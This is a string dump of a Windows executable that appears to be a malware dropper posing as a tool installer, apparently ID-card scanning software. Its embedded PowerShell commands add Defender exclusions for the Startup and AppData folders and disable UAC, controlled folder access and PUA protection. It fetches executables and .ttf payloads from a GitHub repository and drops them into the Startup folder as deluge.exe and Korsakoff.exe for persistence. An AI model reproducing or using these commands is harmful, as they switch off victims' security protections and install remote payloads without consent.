!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
VWATAVAWH
@A_A^A\_^
SVWATAUAVAWH
PA_A^A]A\_^[
WATAUAVAWH
@A_A^A]A\_
@SWATAVH
(A^A\_[
@SVAVAWH
(A_A^^[
WAVAWH
A_A^_
WAVAWH
A_A^_
\$ UVAVH
t&D9t$@w
UATAUH
fF9,Gu
@UWAVH
@UVAWH
UWATAVAWH
fF9$@u
A_A^A\_]
UWATAVAWH
A_A^A\_]
L$ SVWH
H3E H3E
u0HcH<H
Unknown exception
bad cast
%USERPROFILE%
Erreur lors de la copie du fichier : %d
Fichier copi
avec succ
Dir :
InternetOpenA failed with error code:
InternetOpenUrlA failed with error code:
CreateFileA failed with error code:
InternetReadFile failed with error code:
WriteFile failed with error code:
ConsoleWindowClass
Permission required
You need to run as administrator to install this tool.
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"%USERPROFILE%\AppData\Roaming\Microsoft\Windows'"
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Program Files\Windows NT\Accessories\fr-FR'"
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
powershell.exe -command "Set-MpPreference -PUAProtection disable"
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deluge.exe
https://github.com/sahdow3256/CNI/raw/main/Logiciel%20Scan%20CNI%20HNDK/Build_Test2.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Korsakoff.exe
https://github.com/sahdow3256/CNI/raw/main/Korsakoff.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Default.ttf
https://github.com/sahdow3256/CNI/raw/main/Default.ttf
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Keycheck.ttf
https://github.com/sahdow3256/CNI/raw/main/Keycheck.ttf
C:\Program Files\Windows NT\Accessories\fr-FR\deluge.exe
invalid string position
string too long
bad allocation
bad array new length
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.rsrc$01
.rsrc$02
ExpandEnvironmentStringsA
ExpandEnvironmentStringsW
CreateFileA
WriteFile
CloseHandle
GetLastError
GetCurrentProcess
CreateProcessW
GetModuleFileNameW
CopyFileA
AllocConsole
KERNEL32.dll
ShowWindow
MessageBoxA
FindWindowA
USER32.dll
ShellExecuteExA
SHELL32.dll
OpenProcessToken
GetTokenInformation
ADVAPI32.dll
??0_Lockit@std@@QEAA@H@Z
??1_Lockit@std@@QEAA@XZ
?uncaught_exception@std@@YA_NXZ
?_Xlength_error@std@@YAXPEBD@Z
?_Xout_of_range@std@@YAXPEBD@Z
??Bid@locale@std@@QEAA_KXZ
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ
?widen@?$ctype@_W@std@@QEBA_WD@Z
?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z
?getloc@ios_base@std@@QEBA?AVlocale@2@XZ
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z
?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z
?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z
?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z
?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z
?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ
?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z
?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ
?id@?$ctype@_W@std@@2V0locale@2@A
?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A
MSVCP140.dll
InternetOpenA
InternetCloseHandle
InternetOpenUrlA
InternetReadFile
WININET.dll
__std_terminate
__std_exception_copy
__std_exception_destroy
_CxxThrowException
__CxxFrameHandler3
memchr
memcmp
memcpy
memmove
memset
__C_specific_handler
VCRUNTIME140.dll
_invalid_parameter_noinfo_noreturn
__acrt_iob_func
__stdio_common_vfprintf
wcstombs
system
strcpy_s
_callnewh
malloc
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_narrow_argv
_initialize_narrow_environment
_get_initial_narrow_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___argv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_initialize_onexit_table
_register_onexit_function
_crt_atexit
terminate
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-convert-l1-1-0.dll
api-ms-win-crt-string-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetModuleHandleW
.?AVexception@std@@
.?AVbad_cast@std@@
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVbad_array_new_length@std@@
$" }L=.
&$!o[M>
&$!tZL=
IDATx^
pypwww
e'd+Qn|
2BKVCh
%X/AR)W
DCr)Ib)Z
YJWAVZv*
VmJbiI
'Pd_8B6
Ip%+T7e&R
/QPF"(t
y]s 9bX
&r Id#
)+sl<E;i
BglB^Z
iGy~/B&m
>E "p$
y--'=~N
f&A<c%
w`6/MP
R T-T!7x
h1w=jO^
m>AJZ*z
y0Rw#A
@L@JAy
f=m!P5
nC|9p(&O
"K`(j7
-T8/u@
( 4E ;u:
*@j \#
uZu3`{Y~
-RzH5C
sQnt@J
6C%{3P?
e&o@.z~
al_\I@o2
a'cx\ [v
-!VrP;
Z]m:'p
p RmPU
0b)7/"
)]/i;+
Q>@e4 t
$KP>0%
n7!7[P
Kj}@O*
5n=|n#
O*@$0i
s}l:p%*
"pS}_
}/ Q]o
#.\72pk
V*1H"PH
GI?I~y}
[zQ)U@
HEPOGs
=pRNA:
(TtO^x
?#b+JB
txIBZv
^>3K'>-F
E80]6nY'
_|)c'L
]Y"[?#
t:pbrk]
xI)U6@
<Q<DK}
HLRUm#~
Vl.E}#
$tU x|V
j<WBqW
s @z~*
*ow ]
j)R6<V
%5-S&L
%@B8E2
(1*H]`&
s;tU!.
E@2PE@
h(@`y@
0'=KAO
[O:ul#
GN"")pk
S-u&Z@d
K2uJ0U
|,CFMR
?c~z}N
;=*`)@
S|1rM@
4 @@A!
[.QVd.
}!Wo~!
*H 42F
C'/BBg
R&$N|B
_/Q6D7
D$JtRu
)WY|cjK
-(Sf,`
KT-fuc]
wJ wH@
&]/ s}6d
okcNt|
-L_)K8U
. |4\c
UIj6~I
r<cF{n@m
T&!8Fe
;P@ .`
Hh|lx|
"A44#L
F%D:dY
~<,X8|
^qT8T\
jOvTjO
rP0 x(
R0x x(
K(F lhr
::o)Wk
rP0=W8
9+wBZ)w
B+0x8x@
W+8xy(
PA<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGX
%USERPROFILE%
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Korsakoff.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deluge.exe
IDI_ICON1(